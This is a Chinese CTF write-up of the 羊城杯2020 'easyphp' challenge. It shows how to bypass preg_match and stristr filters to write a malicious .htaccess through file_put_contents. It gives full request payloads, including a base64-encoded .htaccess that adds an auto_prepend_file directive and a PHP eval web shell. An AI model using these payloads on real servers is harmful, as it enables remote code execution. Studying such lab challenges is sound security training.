[羊城杯2020]easyphp 一些思考
方法一
1.通过file_put_contents函数来写入木马
2绕过preg_match函数(文件名必须只能带有[a-z.]范围的字符)和stristr函数(通过换行符来进行绕过)
我们可以直接往.hatccess文件中写入木马(机会只有一次)‘
因为.hatccess这个文件会自己绕过preg_match函数。
所有写入的内容如下
php_value auto_prepend_fil\
e .htaccess
#\
payload
?content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23\&filename=.htaccess
下面来解释一下
php_value auto_prepend_file 是用来在页面底部加载文件的
这也是为什么我们要去写入#\ 在文件底部
而#应该是.hatccess文件特有的写入形式,没有的话会直接报错500
最后那个/是用来转意换行符的
可以看出在文件最后有一个换行符,如果不进行转义,那么他真正写入的情况是这个样子
php_value auto_prepend_fil\
e .htaccess
#\
Hello, world
而文件最后的Hello,world会对文件照常影响,不符合写入格式,进而无法解析。
总结:1.strstr函数用换行符进行绕过。
为什么说机会只有一次,因为他会自动删除根目录下所有除了index.php的所有文件,写入成功时,你不刷新,可以看到flag,但是一旦刷新,文件就没有了,所以写入成功也只能刷新一次。
方法二
查阅资料了解到如何绕过preg_match函数
1数组绕过,因为preg_match处理数组会返回NULL,然而这里的伪协议php://filter很明显不支持绕过
2过正则匹配的递归次数来绕过,正则匹配的递归次数由pcre.backtrack_limit参数来控制
要让preg_match返回false,也就是匹配不到,即可绕过preg_match。就是通过设置pcre.backtrack_limit值为0,使得回溯次数为0,来使得正则匹配什么都不匹配,即返回false。
测试一下,是否能绕过preg_match:
![[羊城杯2020]easyphp 一些思考_第1张图片](http://img.e-com-net.com/image/info8/abc4cfc21ef24a7fa44bcfb80755983c.jpg)
成功绕过preg_match。
之后写入成功后
payload
?filename=php://filter/write=convert.base64-decode/resource=.htaccess&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0IDAKcGhwX3ZhbHVlIHBjcmUuaml0IDAKcGhwX3ZhbHVlIGF1dG9fcHJlcGVuZF9maWxlIC5odGFjY2VzcwojYTw/cGhwIGV2YWwoJF9HRVRbMV0pOyA/Plw=&1=phpinfo();
但是并没有复现成功可能是因为权限问题。